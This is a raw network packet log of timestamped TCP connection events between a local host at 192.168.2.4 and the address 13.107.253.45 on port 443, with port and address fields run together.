                                                                                                                                                                            Oct 28, 2024 19:12:32.229609966 CET4434982813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.229693890 CET49828443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.229792118 CET4434982713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.229862928 CET49827443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.243952036 CET49828443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.243988991 CET4434982813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.244007111 CET49828443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.244014978 CET4434982813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.245208979 CET49827443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.245229006 CET4434982713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.245243073 CET49827443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.245249033 CET4434982713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.250247002 CET49832443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.250282049 CET4434983213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.250365973 CET49832443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.250838041 CET49832443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.250854969 CET4434983213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.251635075 CET49833443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.251681089 CET4434983313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.251753092 CET49833443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.251909971 CET49833443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.251925945 CET4434983313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.371743917 CET4434983013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.372199059 CET4434983013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.372253895 CET49830443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.372287035 CET49830443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.372303009 CET4434983013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.372317076 CET49830443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.372323990 CET4434983013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.374430895 CET4434982913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.374524117 CET4434982913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.374588966 CET49829443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.375221014 CET49834443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.375245094 CET4434983413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.375303984 CET49834443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.375390053 CET49829443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.375411034 CET4434982913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.375427008 CET49829443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.375433922 CET4434982913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.376388073 CET49834443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.376405001 CET4434983413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.377460003 CET49835443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.377496958 CET4434983513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.377563000 CET49835443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.377661943 CET49835443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.377676964 CET4434983513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.497734070 CET4434983113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.540978909 CET49831443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.540997028 CET4434983113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.541590929 CET49831443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.541595936 CET4434983113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.672158003 CET4434983113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.672533989 CET4434983113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.672604084 CET49831443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.780482054 CET49831443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.780503988 CET4434983113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.780524015 CET49831443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.780531883 CET4434983113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.799796104 CET49836443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.799844027 CET4434983613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.799921036 CET49836443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.803443909 CET49836443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.803464890 CET4434983613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:33.029788971 CET4434983313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:33.030435085 CET49833443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:33.030514956 CET4434983313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:33.031053066 CET49833443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:33.031106949 CET4434983313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:33.031220913 CET4434983213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:33.031693935 CET49832443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:33.031745911 CET4434983213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:33.032094002 CET49832443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:33.032131910 CET4434983213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:33.125910997 CET4434983413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:33.126595974 CET49834443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:33.126678944 CET4434983413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:33.127075911 CET49834443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:33.127096891 CET4434983413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:33.156364918 CET4434983513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:33.156747103 CET49835443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:33.156781912 CET4434983513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:33.157155991 CET49835443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:33.157164097 CET4434983513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:33.167812109 CET4434983213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:33.167948961 CET4434983213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:33.168026924 CET49832443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:33.168124914 CET49832443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:33.168165922 CET4434983213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:33.168193102 CET49832443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:33.168209076 CET4434983213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:33.169406891 CET4434983313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:33.169429064 CET4434983313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:33.169487000 CET49833443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:33.169517040 CET4434983313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:34.899615049 CET49842443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:34.899632931 CET4434984213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:34.952728033 CET4434984413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:34.958601952 CET49844443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:34.958626986 CET4434984413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:34.959078074 CET49844443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:34.959083080 CET4434984413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:34.960351944 CET4434984313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:34.960632086 CET49843443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:34.960654974 CET4434984313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:34.960975885 CET49843443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:34.960983038 CET4434984313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.037158966 CET4434984213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.037353992 CET4434984213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.037437916 CET49842443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.037615061 CET49842443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.037650108 CET4434984213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.037676096 CET49842443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.037691116 CET4434984213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.040770054 CET49847443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.040807962 CET4434984713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.040925026 CET49847443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.041079044 CET49847443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.041094065 CET4434984713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.059869051 CET4434984513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.065818071 CET49845443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.065829992 CET4434984513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.066235065 CET49845443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.066241026 CET4434984513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.093168020 CET4434984413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.093247890 CET4434984413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.093314886 CET49844443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.093580961 CET49844443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.093599081 CET4434984413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.093609095 CET49844443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.093615055 CET4434984413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.096817970 CET49848443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.096856117 CET4434984813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.096940994 CET49848443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.097119093 CET49848443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.097131968 CET4434984813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.100008011 CET4434984313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.100301027 CET4434984313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.100389004 CET49843443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.102679014 CET49843443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.102689981 CET4434984313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.102700949 CET49843443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.102706909 CET4434984313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.105571985 CET49849443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.105635881 CET4434984913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.105777025 CET49849443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.105912924 CET49849443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.105947971 CET4434984913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.204924107 CET4434984513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.205008030 CET4434984513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.205226898 CET49845443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.205566883 CET49845443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.205566883 CET49845443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.205585003 CET4434984513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.205594063 CET4434984513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.226077080 CET49850443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.226109028 CET4434985013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.226298094 CET49850443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.229933023 CET49850443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.229942083 CET4434985013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.389595032 CET4434984613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.390441895 CET49846443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.390460968 CET4434984613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.390911102 CET49846443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.390916109 CET4434984613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.569566011 CET4434984613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.569742918 CET4434984613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.569793940 CET49846443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.569910049 CET49846443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.569926023 CET4434984613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.569936037 CET49846443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.569940090 CET4434984613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.573018074 CET49851443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.573127031 CET4434985113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.573201895 CET49851443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.573375940 CET49851443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.573411942 CET4434985113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.799936056 CET4434984713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.800488949 CET49847443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.800518990 CET4434984713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.800962925 CET49847443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.800970078 CET4434984713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.861156940 CET4434984913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.861200094 CET4434984813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.861726999 CET49848443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.861737013 CET4434984813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.861736059 CET49849443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.861772060 CET4434984913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.862360001 CET49848443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.862365007 CET4434984813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.862369061 CET49849443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.862385035 CET4434984913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.938277006 CET4434984713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.939300060 CET4434984713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.939377069 CET49847443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.939429045 CET49847443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.939445972 CET4434984713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.939455032 CET49847443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.939460039 CET4434984713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.942229986 CET49852443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.942265034 CET4434985213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.942358017 CET49852443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.942480087 CET49852443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.942491055 CET4434985213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.998245001 CET4434984913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.998357058 CET4434984913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.998399019 CET4434984913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.998424053 CET49849443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.998461008 CET49849443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.998583078 CET49849443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.998600960 CET4434984913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.913554907 CET4434985813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.938524008 CET4434986013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.939101934 CET49860443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.939177990 CET4434986013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.939500093 CET49860443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.939513922 CET4434986013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.940613031 CET4434985713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.940759897 CET4434985713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.940819979 CET49857443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.940897942 CET49857443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.940917015 CET4434985713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.940927029 CET49857443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.940932035 CET4434985713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.943836927 CET49862443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.943897963 CET4434986213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.943985939 CET49862443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.944130898 CET49862443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.944156885 CET4434986213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.963753939 CET4434985913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.964145899 CET49859443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.964160919 CET4434985913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.964581966 CET49859443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.964586020 CET4434985913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.050158024 CET4434985813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.050257921 CET4434985813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.050322056 CET49858443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.050452948 CET49858443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.050470114 CET4434985813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.050482988 CET49858443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.050489902 CET4434985813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.053417921 CET49863443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.053456068 CET4434986313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.053533077 CET49863443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.053689003 CET49863443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.053702116 CET4434986313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.080221891 CET4434986013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.080292940 CET4434986013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.080351114 CET49860443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.080410004 CET4434986013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.080450058 CET4434986013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.080497026 CET49860443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.080547094 CET49860443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.080547094 CET49860443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.080580950 CET4434986013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.080605030 CET4434986013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.082652092 CET49864443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.082678080 CET4434986413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.082758904 CET49864443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.082887888 CET49864443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.082901001 CET4434986413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.112287045 CET4434985913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.112478018 CET4434985913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.112539053 CET49859443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.112586021 CET49859443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.112596989 CET4434985913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.112608910 CET49859443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.112612009 CET4434985913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.114753008 CET49865443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.114789963 CET4434986513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.114865065 CET49865443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.114988089 CET49865443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.115001917 CET4434986513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.422183037 CET4434986113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.422700882 CET49861443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.422713995 CET4434986113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.423187971 CET49861443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.423192978 CET4434986113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.561736107 CET4434986113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.561808109 CET4434986113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.561861992 CET49861443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.561873913 CET4434986113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.561930895 CET4434986113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.561980009 CET49861443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.562133074 CET49861443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.562150002 CET4434986113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.562160015 CET49861443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.562165976 CET4434986113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.565093040 CET49866443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.565136909 CET4434986613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.565207005 CET49866443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.565485954 CET49866443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.565500975 CET4434986613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.716548920 CET4434986213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.717030048 CET49862443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.717098951 CET4434986213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.717644930 CET49862443192.168.2.413.107.253.45
